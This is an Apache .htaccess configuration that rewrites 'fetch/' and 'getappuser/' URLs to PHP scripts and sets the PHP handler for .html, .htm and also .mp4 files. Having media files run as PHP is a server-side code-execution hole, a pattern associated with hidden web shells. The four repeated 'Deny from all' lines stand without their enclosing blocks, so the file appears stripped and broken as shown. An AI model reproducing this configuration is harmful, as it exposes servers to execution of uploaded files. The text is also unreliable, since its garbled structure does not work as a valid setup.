AddType application/x-httpd-php .html .htm
Options -Indexes
RewriteEngine on
# Don't apply to URLs that go to existing files or folders.
RewriteOptions InheritDown
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^fetch/(.*)$ fetch.php?path=$1 [NC,L]
RewriteRule ^getappuser/(.*)$ getappuser.php?path=$1 [NC,L]
AddType application/x-httpd-php .html .htm .mp4
Order Allow,Deny
Deny from all
Order Allow,Deny
Deny from all
Order Allow,Deny
Deny from all
Order Allow,Deny
Deny from all